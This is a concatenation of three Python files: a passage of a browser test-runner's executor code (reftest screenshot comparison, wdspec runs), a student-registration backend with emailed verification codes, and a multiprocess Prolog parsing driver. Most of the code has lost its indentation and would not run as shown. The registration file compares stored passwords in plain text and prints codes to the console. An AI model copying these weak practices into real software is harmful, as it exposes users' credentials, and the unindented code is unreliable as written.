executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
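# Worked examples matching the docstring above:
#   get_pages([[1, 2], [4], [6, None]], 10) == {1, 2, 4, 6, 7, 8, 9, 10}
#   get_pages(None, 3) == {1, 2, 3}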
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
            return False, None
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of the reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
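# A small standalone illustration (a sketch, not used by the harness itself) of the fuzzy
# acceptance rule applied in RefTestImplementation.check_pass above: a comparison counts as
# equal when both the maximum per-channel difference and the number of differing pixels fall
# inside their allowed [min, max] ranges, or when a zero lower bound is met by an exact match.
def _fuzzy_allows(max_per_channel, pixels_different, fuzzy):
    allowed_per_channel, allowed_different = fuzzy
    return ((pixels_different == 0 and allowed_different[0] == 0) or
            (max_per_channel == 0 and allowed_per_channel[0] == 0) or
            (allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
             allowed_different[0] <= pixels_different <= allowed_different[1]))
# e.g. _fuzzy_allows(3, 10, ((0, 5), (0, 20))) is True, while _fuzzy_allows(6, 10, ((0, 5), (0, 20))) is False.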
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout,
environ=self.environ)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message", "")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
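# Illustrative sketch (not called by the harness): WdspecRun wraps a callable so that it runs
# in a worker thread and is reported as EXTERNAL-TIMEOUT if it does not finish in time. The
# callable and the arguments below are hypothetical.
def _example_wdspec_run():
    def quick_func(session, path, timeout):
        return ("OK", [])

    success, data = WdspecRun(quick_func, session=None, path="/dev/null", timeout=5).run()
    # success is True and data == ("OK", []) when quick_func returns in time;
    # otherwise success is False and data == ("EXTERNAL-TIMEOUT", None).
    return success, data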
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
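# Minimal sketch of what an entry in the `actions` registry above is expected to look like.
# The real classes are imported via `actions`; this hypothetical _ExampleLogAction only
# illustrates the interface CallbackHandler relies on: a `name` class attribute, a
# (logger, protocol) constructor, and a __call__ that receives the testdriver payload dict.
class _ExampleLogAction(object):
    name = "example_log"

    def __init__(self, logger, protocol):
        self.logger = logger
        self.protocol = protocol

    def __call__(self, payload):
        # Log the message carried in the payload and return a JSON-serialisable result.
        self.logger.info(payload.get("message", ""))
        return None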
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
user.py
|
'''test
References the helper functions defined in utils.py
'''
import sys
import os
sys.path.append('./../')
from tools import utils
from db import db_helper, app, model_repr
from threading import Timer, Thread, Lock
import time
import collections
import sched
codes = collections.OrderedDict()
s = sched.scheduler(time.time, time.sleep)  # scheduler used to periodically delete expired verification codes
scheduler_lock = Lock()
is_scheduler_running = False  # whether the scheduler is currently running
# test setting
# time_limit = 60 * 0.2
# production setting
time_limit = 60 * 5
def register_(email, password, student_id, sex, collage, grade, name, validate_code):
res = {}
if(email not in codes):
res = {'error': 1, 'error_message': 'No verification code was requested or the code has expired'}
elif(codes[email][0] != validate_code):
res = {'error': 1, 'error_message': 'Incorrect verification code'}
else:
'''
Check whether the email address is already registered
'''
error_code, error_message, openid = db_helper.sign_up_true(email, password, student_id, sex, collage, grade, name)
if(error_code == 0):
try:
codes.pop(email)
except Exception as e:
print('Error:', e)
res = {'error': str(error_code), 'error_message': error_message, 'data': {'openid': str(openid)}}
else:
res = {'error': str(error_code), 'error_message': error_message, 'data': {'openid': str(openid)}}
return str(res)
def get_verification_code_(email):
'''
Request a verification code for the given email address.
The code is valid for a limited time and is deleted automatically once that period has passed.
'''
global is_scheduler_running
res = {}
# the previous verification code has not expired yet
if(email in codes):
res = {'error': 1, 'error_message': 'The previous verification code has not expired yet'}
print(str(res))
# normal case
else:
'''
# generate a test code (without sending an email)
# code = utils.generate_verification_code()
Send an email and generate a verification code
code = utils.send_email(rcptto=email)
'''
# code = '11111' # generate a verification code and send it to the mailbox
code = utils.send_email(rcptto=email)
if code == -1:
return str({'error': 1, 'error_message': 'Failed to send the verification code'})
codes[email] = (code, time.time()) # record the verification code locally
print('Generated verification code', codes[email])
# print(is_scheduler_running)
if(not is_scheduler_running): # if the scheduler is not running
enter_event_and_run_scheduler()
res = {'error': 0, 'error_message': 'Verification code has been sent'}
return str(res)
def delete_invalid_codes():
'''
Delete the locally stored verification codes that have expired (become invalid).
An OrderedDict keeps insertion order, so the oldest codes always come first; iterate from the front and delete until the first non-expired code is reached.
'''
global is_scheduler_running
for k in list(codes):
if(time.time() - codes[k][1] < time_limit):
break
if(k in codes):
try:
print('Deleted verification code:', codes.pop(k))
except Exception as e:
print('Error:', e)
if(len(codes) > 0 and s.empty()): # if codes remain and the schedule queue is empty, re-enter delete_invalid_codes into the scheduler
s.enter(time_limit, 0, delete_invalid_codes)
else:
is_scheduler_running = False
if(len(codes) > 0 and not is_scheduler_running): # thread-safety: a code may have been added while the scheduler was not running
enter_event_and_run_scheduler()
def enter_event_and_run_scheduler():
scheduler_lock.acquire()
global is_scheduler_running
if(not is_scheduler_running):
is_scheduler_running = True
if(s.empty()):
s.enter(2, 0, delete_invalid_codes)
t = Thread(target = s.run)
t.start()
scheduler_lock.release()
def update_(form):
'''Update user information
Attributes that may be passed: password/student_id/sex/collage/grade/name/edu_bg/signature
input:
openid
attrs
(old_password:)
output:
error
data:
msg: wrong old password / update succeeded / update failed / no such student or organization / email cannot be changed
'''
openid = int(form['openid'])
success = True
msg = "Update succeeded"
for item in form.items():
if(item[0] == 'openid' or item[0] == 'old_password'):
continue
if(item[0] == 'password'):
target = db_helper.query_student(openid) if openid >= app.config['SPLIT_STU_ORG'] else db_helper.query_oraganization(openid)
if target == None:
return str({'error': 1, "data": {'msg': '不存在该学生或组织'}})
if('old_password' not in form):
return str({"error": 1, "data": {"msg": '请输入旧密码'}})
if target.password == form['old_password']:
success, msg = db_helper.update_student_or_organization(openid, item[0], item[1])
if(not success):
return str({"error": 1, "data": {"msg": msg}})
else:
return str({'error': 1, "data": {'msg': '旧密码错误'}})
else:
success, msg = db_helper.update_student_or_organization(openid, item[0], item[1])
if(not success):
return str({"error": 1, "data": {"msg": msg}})
return str({"error": 0, "data": {"msg": "更改成功"}})
# def printf():
# print(s.empty())
# print('test')
# print(s.empty())
# test
'''
if __name__ == '__main__':
enter_event_and_run_scheduler()
s.enter(time_limit, 0, printf)
print(s.empty())
s.run()
print(s.empty())
# test requesting, storing and deleting verification codes
# time_limit = 60 * 0.1
get_verification_code_('11.qq.com')
get_verification_code_('11.qq.com') # test the case where the previous code has not expired
# case: deleting when no verification code has expired yet
delete_invalid_codes()
print('ok1')
time.sleep(5)
delete_invalid_codes()
print('ok2')
# case: deleting expired verification codes
time.sleep(2)
delete_invalid_codes()
print('ok3')
# request a new code
get_verification_code_('2')
print(codes)
# output:
# Generated verification code ('11111', 1559045170.948554)
# {'error': 1, 'data': {'msg': 'The previous verification code has not expired yet'}}
# ok1
# ok2
# Deleted verification code: ('11111', 1559045170.948554)
# ok3
# Generated verification code ('11111', 1559045177.9637892)
# OrderedDict([('2', ('11111', 1559045177.9637892))])
'''
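# Illustrative usage sketch (not executed anywhere; the email address and registration data
# below are hypothetical). A caller first requests a code, then registers with it:
def _example_verification_flow():
    print(get_verification_code_('someone@example.com'))  # sends a code and schedules its expiry
    code = codes.get('someone@example.com', ('', 0))[0]    # the code kept locally for checking
    print(register_('someone@example.com', 'secret', '20180001', 'male',
                    'CS', '2018', 'Alice', code))          # a correct code is consumed on success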
|
multiprocessed_parsing.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright © 2010-2011 University of Zürich
# Author: Rico Sennrich <sennrich@cl.uzh.ch>
# Implements multiprocessed parsing
from __future__ import unicode_literals
import sys
import os
import time
import multiprocessing
import codecs
from subprocess import Popen, PIPE
class Parser(multiprocessing.Process):
def __init__(self, task_queue, result_dict,commandlist,commandpath,error_signal):
multiprocessing.Process.__init__(self)
self.task_queue = task_queue
self.result_dict = result_dict
self.parsing = Popen(commandlist,cwd=commandpath, stdin=PIPE, stdout=PIPE)
self.error_signal = error_signal
def run(self):
while True:
index,next_task = self.task_queue.get()
if next_task is None:
# Poison pill in task queue
self.parsing.terminate()
break
self.parsing.stdin.write(next_task)
self.parsing.stdin.flush()
answer = ''
while True:
outline = self.parsing.stdout.readline().decode("UTF-8")
#if we ever reach the end of parsing.stdout, this indicates that the parser process has crashed
if not outline:
sys.stderr.write("Parser process {0} has crashed on sentence {1}. If you don't see swipl error message, try parsing sentence in single-processed mode (option -p 1).\n".format(self.parsing.pid,index+1))
self.error_signal.value = 1
self.parsing.terminate()
return
answer += outline
#This signals that parser has finished with the sentence and can begin with the next one
if outline == '%%END_OF_SENTENCE\n':
break
self.result_dict[index] = answer
return
#Segments input into sentences and sends them to tasks queue
def segment_sent(inpipe,tasks,num_parsers,sentdelim,todo):
i = 0
msg = b''
for line in inpipe:
msg += line
#sentdelim signals end of sentence; sentence is sent to queue as single job
if b'_' + sentdelim + b"']," in line:
todo.value = i+2 # this ensures that the number of finished tasks never equals todo
tasks.put((i,msg + b'\n'))
i += 1
msg = b''
# Add a poison pill for each parser
for i in range(num_parsers):
tasks.put((None,None))
# After this point, allow process to finish if all tasks are done
todo.value -= 1
#Results from all processes are written to shared dictionary
#this function writes the results and clears memory as soon as possible
def generate_output(results,todo,outpipe,error_signal):
i = 0
#This is only False if all sentences have been parsed or swipl crashed
while i < todo.value and not error_signal.value:
try:
result = results[i]
outpipe.write(result)
del(results[i])
i += 1
except KeyError:
time.sleep(0.1)
if error_signal.value:
break
outpipe.close()
#Segments sentences, parses them using num_parsers parallel processes, and combines output of all parser processes
def main(inpipe,outpipe,num_parsers,sentdelim,commandlist,commandpath):
# Establish process communication protocols
tasks = multiprocessing.Queue(num_parsers+1) #sends tasks from segment_sent to parser
manager = multiprocessing.Manager()
results = manager.dict()
todo = manager.Value('i',1)
error_signal = manager.Value('i',0)
# Start parsers
parsers = [ Parser(tasks, results,commandlist,commandpath,error_signal)
for i in range(num_parsers) ]
for w in parsers:
w.start()
#enqueue sentences to parse
p = multiprocessing.Process(target=segment_sent, args=(inpipe,tasks,num_parsers,sentdelim,todo))
p.start()
generate_output(results,todo,outpipe,error_signal)
#prevent hangup when all parser processes crash (which hopefully never happens)
for parser in parsers:
parser.terminate()
p.terminate()
if __name__ == "__main__":
if sys.version_info < (3, 0):
sys.stdout = codecs.getwriter('UTF-8')(sys.stdout)
sys.stderr = codecs.getwriter('UTF-8')(sys.stderr)
sys.stdin = codecs.getreader('UTF-8')(sys.stdin)
#hack to relay stdin to new multiprocessing.Process
init_pipe = Popen(["cat"], stdin=sys.stdin,stdout=PIPE)
try:
num_parsers = int(sys.argv[1])
except:
num_parsers = 2
args = sys.argv[2]
if sys.version_info < (3, 0):
sentdelim = bytes(sys.argv[3])
else:
sentdelim = bytes(sys.argv[3], encoding="UTF-8")
path = sys.argv[4]
prolog = sys.argv[5]
prolog_load = sys.argv[6]
runCMD = [prolog, '-q', prolog_load, 'ParZu-parser.pl', '-g', args]
if prolog.endswith('swipl'):
runCMD += ['-t', 'halt.','-G248M', '-L248M']
main(init_pipe.stdout,sys.stdout,num_parsers,sentdelim,runCMD,path)
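# Illustrative invocation (all values hypothetical; see the sys.argv handling above for the
# expected order: number of parsers, prolog goal, sentence delimiter, working directory,
# prolog binary, prolog load flag):
#   cat tagged_input | python multiprocessed_parsing.py 4 go SENT /path/to/ParZu/core swipl -s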
|
